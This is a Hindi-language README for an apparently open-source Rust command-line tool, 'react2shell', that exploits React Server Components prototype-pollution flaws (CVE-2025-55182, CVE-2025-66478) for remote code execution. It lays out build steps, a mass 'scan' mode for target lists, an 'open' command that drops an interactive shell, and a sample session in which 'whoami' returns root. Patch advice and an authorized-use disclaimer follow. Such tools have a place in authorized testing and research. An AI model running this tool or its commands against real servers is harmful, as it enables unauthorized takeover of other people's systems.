
एक CLI उपकरण जो React Server Components और Server Actions में कमजोरियों (CVE-2025-55182, CVE-2025-66478) का शोषण करके कमजोर सर्वरों पर रिमोट कोड निष्पादन (RCE) प्राप्त करता है।
React सर्वर घटकों / सर्वर कार्रवाइयों (CVE-2025-55182 और CVE-2025-66478) में प्रोटोटाइप प्रदूषण कमजोरियों का शोषण करने, कमजोर सर्वरों पर दूरस्थ कोड निष्पादन (RCE) सक्षम करने के लिए एक CLI उपकरण।
मूल PoC : https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc
चेतावनी: यह उपकरण एक गंभीर कमजोरी (CVSS 10.0) को लक्षित करता है जो वास्तविक दुनिया में सक्रिय रूप से शोषित की जा रही है। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है।
यह उपकरण पूरी तरह से शैक्षिक उद्देश्यों, अधिकृत सुरक्षा परीक्षण, अनुमति के साथ प्रवेश परीक्षण, और कमजोरी अनुसंधान के लिए अभिप्रेत है।
लेखक और योगदानकर्ता इस उपकरण के उपयोग से उत्पन्न किसी भी दुरुपयोग, क्षति या कानूनी परिणामों के लिए कोई दायित्व नहीं मानते हैं। आप पूरी तरह से यह सुनिश्चित करने के लिए जिम्मेदार हैं कि आपका उपयोग सभी लागू कानूनों, नियमों और सेवा की शर्तों का अनुपालन करता है।
अनुमति के बिना प्रणालियों के विरुद्ध अनधिकृत उपयोग अधिकांश न्यायक्षेत्रों में अवैध है और इसके गंभीर दंड हो सकते हैं।
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release
बाइनरी (या Windows पर ) पर होगी।
target/release/react2shellreact2shell.exeरिलीज़ पृष्ठ से डाउनलोड करें।
react2shell [COMMAND] [SOURCE]
open <URL>: लक्ष्य पर एक इंटरैक्टिव रिवर्स शेल खोलें (यदि कमजोर है)।scan <FILE>: कमजोरी के लिए एक फ़ाइल (प्रति पंक्ति एक URL) से लक्ष्यों की सूची स्कैन करें।# इंटरैक्टिव शेल खोलें
react2shell open http://vulnerable-target.com
# कई लक्ष्य स्कैन करें
react2shell scan targets.txt
# एकल लक्ष्य स्कैन करें
react2shell scan http://127.0.0.1:3000
[email protected]:3000 (js)
$ /help # सभी समर्थित आदेश प्रदर्शित करें
Commands;
/new <URL> ; URL लक्ष्य बदलें # URL लक्ष्य बदलें
/use exec ; आदेश निष्पादित करें और आउटपुट की प्रतीक्षा करें # exec मोड पर स्विच करें (परिणाम की प्रतीक्षा करता है)
/use exec-no-wait ; आदेश निष्पादित करें बिना प्रतीक्षा # बिना आउटपुट की प्रतीक्षा के exec मोड
/use js ; जावास्क्रिप्ट कोड निष्पादित करें # JavaScript मोड पर वापस स्विच करें
/set timeout <ms> ; आदेश टाइमआउट मिलीसेकंड में सेट करें # कमांड टाइमआउट कॉन्फ़िगर करें
/show options ; वर्तमान कॉन्फ़िगरेशन दिखाएं # वर्तमान शेल सेटिंग्स प्रदर्शित करें
/clear ; स्क्रीन साफ़ करें # टर्मिनल स्क्रीन साफ़ करें
/exit or /quit ; शेल से बाहर निकलें # इंटरैक्टिव शेल से बाहर निकलें
Examples;
ls -la # उदाहरण Linux कमांड
whoami # वर्तमान सिस्टम उपयोगकर्ता दिखाएं
console.log('Hello') # उदाहरण JavaScript कमांड
[email protected]:3000 (js)
$ /use exec # JS मोड से exec मोड पर स्विच करें
[+] शेल मोड को exec में बदलें
[email protected]:3000 (exec)
$ whoami # वर्तमान निष्पादन उपयोगकर्ता सत्यापित करें
root # कमांड आउटपुट
React सर्वर घटकों का उपयोग करने वाले एप्लिकेशन जो App राउटर के साथ हैं, निम्नलिखित संस्करण चलाने पर प्रभावित होते हैं:
निम्नलिखित प्रभावित नहीं हैं:
यह कमजोरी React संस्करण 19.0, 19.1.0, 19.1.1 और 19.2.0 में निम्नलिखित पैकेजों के भीतर मौजूद है:
react-server-dom-webpackreact-server-dom-parcelreact-server-dom-turbopackपैच किए गए संस्करणों में तत्काल उन्नयन की दृढ़ता से अनुशंसा की जाती है, विशेष रूप से उत्पादन वातावरण के लिए।
प्राथमिक समाधान React और Next.js के पैच किए गए संस्करणों में उन्नयन करना है।
Next.js एप्लिकेशन के लिए, आधिकारिक स्वचालित फिक्सर का उपयोग करें:
npx fix-react2shell-next
अधिक जानकारी: vercel-labs/fix-react2shell-next
आधिकारिक सलाह देखें:
यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए जारी की गई है। सभी उपयोग की जिम्मेदारी अंतिम उपयोगकर्ता पर निहित है।